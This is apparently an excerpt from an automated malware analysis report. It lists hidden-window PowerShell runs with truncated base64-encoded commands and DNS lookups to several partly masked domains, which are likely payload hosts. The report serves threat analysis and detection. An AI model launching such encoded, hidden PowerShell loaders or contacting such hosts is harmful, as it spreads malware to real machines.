Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABOAF8AbwBfAEEAWgBEAFUAPQAnAE0AYwBCAF8AQwA0AEEAawBYACcAOwAkAFoARAAxAEEAQQBBAEEAQQA0AFoAQQBBAG8AIAA9AC...
- DNS ASK dr##art.org
- DNS ASK ki##net.jp
- DNS ASK pb####er.home.pl
- DNS ASK pr#####omascaras.com
- DNS ASK bl##.yst.global
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABOAF8AbwBfAEEAWgBEAFUAPQAnAE0AYwBCAF8AQwA0AEEAawBYACcAOwAkAFoARAAxAEEAQQBBAEEAQQA0AFoAQQBBAG8AIAA9AC...' (with hidden window)